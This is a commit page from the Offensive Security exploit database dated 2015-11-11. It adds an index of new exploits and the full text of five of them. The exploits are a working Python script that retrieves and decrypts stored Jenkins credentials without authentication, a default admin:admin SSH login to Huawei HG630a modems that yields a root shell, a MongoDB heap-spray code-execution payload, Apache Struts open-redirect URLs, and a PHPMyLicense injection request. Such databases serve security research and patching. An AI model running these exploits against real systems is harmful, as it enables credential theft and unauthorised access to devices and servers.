Skip to content

Commit f98ebec

Browse files
author
Offensive Security
committed
DB: 2015-11-11
11 new exploits
1 parent 8a3d4b8 commit f98ebec

12 files changed

Lines changed: 1351 additions & 0 deletions

File tree

files.csv

Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -34730,6 +34730,7 @@ id,file,description,date,author,platform,type,port
3473034730
38439,platforms/php/webapps/38439.txt,"WordPress Traffic Analyzer Plugin 'aoid' Parameter Cross Site Scripting Vulnerability",2013-04-09,Beni_Vanda,php,webapps,0
3473134731
38440,platforms/php/webapps/38440.txt,"phpMyAdmin 'tbl_gis_visualization.php' Multiple Cross Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0
3473234732
38441,platforms/php/webapps/38441.txt,"WordPress Spiffy XSPF Player Plugin 'playlist_id' Parameter SQL Injection Vulnerability",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0
34733+
38442,platforms/php/dos/38442.txt,"PHPMyLicense 3.0.0 - 3.1.4 - DoS",2015-10-11,"Aria Akhavan Rezayat",php,dos,0
3473334734
38443,platforms/php/webapps/38443.txt,"Liferay 6.1.0 CE - Privilege Escalation",2015-10-11,"Massimo De Luca",php,webapps,0
3473434735
38444,platforms/win32/dos/38444.py,"Tomabo MP4 Converter 3.10.12 - 3.11.12 (.m3u) Denial of service (Crush application)",2015-10-11,"mohammed Mohammed",win32,dos,0
3473534736
38445,platforms/php/webapps/38445.txt,"Joomla Real Estate Manager Component 3.7 - SQL injection",2015-10-11,"Omer Ramić",php,webapps,0
@@ -34920,7 +34921,10 @@ id,file,description,date,author,platform,type,port
3492034921
38641,platforms/multiple/webapps/38641.rb,"JSSE SKIP-TLS Exploit",2015-11-05,"Ramon de C Valle",multiple,webapps,0
3492134922
38643,platforms/php/webapps/38643.txt,"WordPress Pie Register Plugin 'wp-login.php' Multiple Cross Site Scripting Vulnerabilities",2013-07-12,gravitylover,php,webapps,0
3492234923
38646,platforms/jsp/webapps/38646.txt,"NXFilter 3.0.3 - Multiple XSS Vulnerabilities",2015-11-06,hyp3rlinx,jsp,webapps,0
34924+
38649,platforms/php/webapps/38649.txt,"Google AdWords API PHP client library <= 6.2.0 - Arbitrary PHP Code Execution",2015-11-07,"Dawid Golunski",php,webapps,0
3492334925
38650,platforms/windows/dos/38650.py,"QNap QVR Client 5.1.0.11290 - Crash PoC",2015-11-07,"Luis Martínez",windows,dos,0
34926+
38651,platforms/php/webapps/38651.txt,"eBay Magento CE <= 1.9.2.1 - Unrestricted Cron Script (Potential Code Execution / DoS)",2015-11-07,"Dawid Golunski",php,webapps,0
34927+
38652,platforms/php/webapps/38652.txt,"Google AdWords <= 6.2.0 API client libraries - XML eXternal Entity Injection (XXE)",2015-11-07,"Dawid Golunski",php,webapps,0
3492434928
38653,platforms/asp/webapps/38653.txt,"Corda Highwire 'Highwire.ashx' File Path Disclosure Vulnerability",2013-07-12,"Adam Willard",asp,webapps,0
3492534929
38654,platforms/php/webapps/38654.txt,"OpenEMR <= 4.1 'note' Parameter HTML Injection Vulnerability",2013-07-12,"Nate Drier",php,webapps,0
3492634930
38655,platforms/asp/webapps/38655.txt,"Corda .NET Redirector 'redirector.corda' Cross Site Scripting Vulnerability",2013-07-12,"Adam Willard",asp,webapps,0
@@ -34930,3 +34934,10 @@ id,file,description,date,author,platform,type,port
3493034934
38660,platforms/php/remote/38660.rb,"Wordpress Ajax Load More PHP Upload Vulnerability",2015-11-09,metasploit,php,remote,0
3493134935
38661,platforms/php/webapps/38661.txt,"TestLink 1.9.14 - CSRF Vulnerability",2015-11-09,"Aravind C Ajayan, Balagopal N",php,webapps,0
3493234936
38662,platforms/multiple/dos/38662.txt,"FreeType 2.6.1 TrueType tt_sbit_decoder_load_bit_aligned Heap-Based Out-of-Bounds Read",2015-11-09,"Google Security Research",multiple,dos,0
34937+
38663,platforms/hardware/remote/38663.txt,"Huawei HG630a and HG630a-50 - Default SSH Admin Password on ADSL Modems",2015-11-10,"Murat Sahin",hardware,remote,0
34938+
38664,platforms/java/webapps/38664.py,"Jenkins 1.633 - Unauthenticated Credential Recovery",2015-11-10,"The Repo",java,webapps,0
34939+
38665,platforms/php/webapps/38665.txt,"YESWIKI 0.2 - Path Traversal Vulnerability",2015-11-10,HaHwul,php,webapps,0
34940+
38666,platforms/multiple/remote/38666.txt,"Apache Struts <= 2.2.3 Multiple Open Redirection Vulnerabilities",2013-07-16,"Takeshi Terada",multiple,remote,0
34941+
38667,platforms/windows/remote/38667.py,"ReadyMedia Remote Heap Buffer Overflow Vulnerability",2013-07-15,"Zachary Cutlip",windows,remote,0
34942+
38668,platforms/windows/local/38668.c,"Cisco WebEx One-Click Client Password Encryption Information Disclosure Vulnerability",2013-07-09,"Brad Antoniewicz",windows,local,0
34943+
38669,platforms/multiple/remote/38669.txt,"MongoDB 'conn' Mongo Object Remote Code Execution Vulnerability",2013-06-04,"SCRT Security",multiple,remote,0

platforms/hardware/remote/38663.txt

Lines changed: 42 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,42 @@
1+
# Exploit Title: Huawei HG630a and HG630a-50 Default SSH Admin Password on
2+
Adsl Modems
3+
# Date: 10.11.2015
4+
# Exploit Author: Murat Sahin
5+
# Vendor Homepage: Huawei
6+
# Version: HG630a and HG630a-50
7+
# Tested on: linux,windows
8+
9+
Adsl modems force you to change admin web interface password. Even though
10+
you can change admin password on the web interface, the password you
11+
assign does not apply to ssh. So, SSH password always will be
12+
'Username:admin Password:admin'.
13+
14+
Ex:
15+
16+
*ssh admin@modemIP <admin@192.168.1.1>*
17+
admin@modemIP <admin@192.168.1.1>'s password:*admin*
18+
PTY allocation request failed on channel 0
19+
------------------------------
20+
-
21+
-----Welcome to ATP Cli------
22+
-------------------------------
23+
ATP>?
24+
?
25+
cls
26+
debug
27+
help
28+
save
29+
?
30+
exit
31+
ATP>shell
32+
shell
33+
34+
35+
BusyBox vv1.9.1 (2013-12-31 16:16:20 CST) built-in shell (ash)
36+
Enter 'help' for a list of built-in commands.
37+
38+
# cat /proc/version
39+
cat /proc/version
40+
Linux version 2.6.30 (y00179387@localhost) (gcc version 4.4.2
41+
(Buildroot 2010.02-git) ) #10 SMP PREEMPT Tue Dec 31 16:20:50 CST 2013
42+
#

platforms/java/webapps/38664.py

Lines changed: 60 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,60 @@
1+
# Exploit Title: Jenkins Unauthenticated Credential Recovery
2+
# Disclosure Date: 10/14/2015
3+
# Response Date: 10/14/2015
4+
# Response: "Recommend this be rejected as a vulnerability."
5+
# Full report including response: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html
6+
# Vendor Homepage: https://jenkins-ci.org/
7+
# Tested on: Jenkins v1.633
8+
# Author = 'Th3R3p0' | Justin Massey
9+
# Google Dork: intitle:"Dashboard [Jenkins]" Credentials
10+
11+
import requests
12+
import re
13+
from BeautifulSoup import BeautifulSoup
14+
import urllib
15+
16+
17+
# Usage: Modify the URL below to match the target host and port
18+
# Must have trailing slash at end of URL
19+
url='http://192.168.1.151:8080/'
20+
21+
# makes request to gather all users with stored credentials
22+
r= requests.get(url + 'credential-store/domain/_/')
23+
soup = BeautifulSoup(r.text)
24+
25+
# loop to go through all hrefs and match the regex "credential" and add the urls to the users list
26+
users = []
27+
for link in soup.body.findAll('a', href=True):
28+
m = re.match("credential", link['href'])
29+
if m:
30+
if link['href'] not in users:
31+
users.append(link['href'])
32+
33+
for users in users:
34+
r2 = requests.get(url + 'credential-store/domain/_/'+users+'/update')
35+
soup2 = BeautifulSoup(r2.text)
36+
37+
# Finds the user and password value in html and stores in encPass variable
38+
user = soup2.body.findAll(attrs={"name" : "_.username"})[0]['value']
39+
encPass = soup2.body.findAll(attrs={"name" : "_.password"})[0]['value']
40+
# Encodes the password to www-form-urlencoded standards needed for the expected content type
41+
encPassEncoded = urllib.quote(encPass, safe='')
42+
43+
# Script to run in groovy scripting engine to decrypt the password
44+
script = 'script=hudson.util.Secret.decrypt+%%27' \
45+
'%s'\
46+
'%%27&json=%%7B%%22script%%22%%3A+%%22hudson.util.Secret.decrypt+%%27' \
47+
'%s' \
48+
'%%27%%22%%2C+%%22%%22%%3A+%%22%%22%%7D&Submit=Run' % (encPassEncoded, encPassEncoded)
49+
50+
# Using sessions because the POST requires a session token to be present
51+
with requests.Session() as s:
52+
r3 = s.get(url+'script')
53+
headers = {'content-type': 'application/x-www-form-urlencoded'}
54+
r3 = s.post(url+'script',data=script, headers=headers)
55+
soup3 = BeautifulSoup(r3.text)
56+
57+
# Extracts password from body
58+
password = soup3.body.findAll('pre')[1].text
59+
password = re.sub('Result:', '', password)
60+
print "User: %s | Password:%s" % (user, password)

platforms/multiple/remote/38666.txt

Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
source: http://www.securityfocus.com/bid/61196/info
2+
3+
Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
4+
5+
An attacker can leverage these issues by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.
6+
7+
Apache Struts 2.0.0 prior to 2.3.15.1 are vulnerable.
8+
9+
http://www.example.com/struts2-showcase/fileupload/upload.action?redirect:http://www.example.com/
10+
http://www.example.com/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.example.com/%23

platforms/multiple/remote/38669.txt

Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,13 @@
1+
source: http://www.securityfocus.com/bid/61309/info
2+
3+
MongoDB is prone to a remote code execution vulnerability because it fails to properly sanitize user-supplied input.
4+
5+
An attacker can exploit this vulnerability to execute arbitrary code within the context of the affected application.
6+
7+
MongoDB 2.4.4 is vulnerable; other versions may also be affected.
8+
9+
use databaseMapped
10+
11+
sizechunk=0x1338; chunk=""; for(i=0;i<sizechunk;i++){ chunk+="\x05\x7c\x77\x55\x08\x04\x00\x00"; } for(i=0;i<30000;i++){ db.my_collection.insert({my_chunk:chunk}) }
12+
13+
db.eval('Mongo.prototype.find("a",{"b":"c"},"d","e","f","g","h")');

platforms/php/dos/38442.txt

Lines changed: 27 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,27 @@
1+
Hello, I want to report following exploit:
2+
3+
4+
# Exploit Title: PHPMyLicense Stored Cross Site Scripting
5+
# Date: 09-10-2015
6+
# Exploit Author: Aria Akhavan Rezayat @ Websec GesmbH
7+
# Website: https://websec-test.com
8+
# Vendor Homepage: https://phpmylicense.com
9+
# Software Link: http://codecanyon.net/item/phpmylicense/11719122
10+
# Version: 3.0.0 - 3.1.4 (REQUIRED)
11+
# Category: Webapps
12+
13+
1.) Description:
14+
15+
Any registered user can simply disable functionality of the whole application and input malicious code because of a lack of filtering.
16+
17+
2.) Proof of Concept:
18+
19+
localhost/phpmylicense/ajax/
20+
21+
POST:
22+
23+
comments=bla-->MaliciousCode<%21--&customer_email=bla&domain=bla&expirydate=26-10-2014&handler=newlicense&parameters=bla&productid=20&serialkey=bla&status=processing
24+
25+
3.) Solution:
26+
27+
None. - No Update available for it.

0 commit comments

Comments
 (0)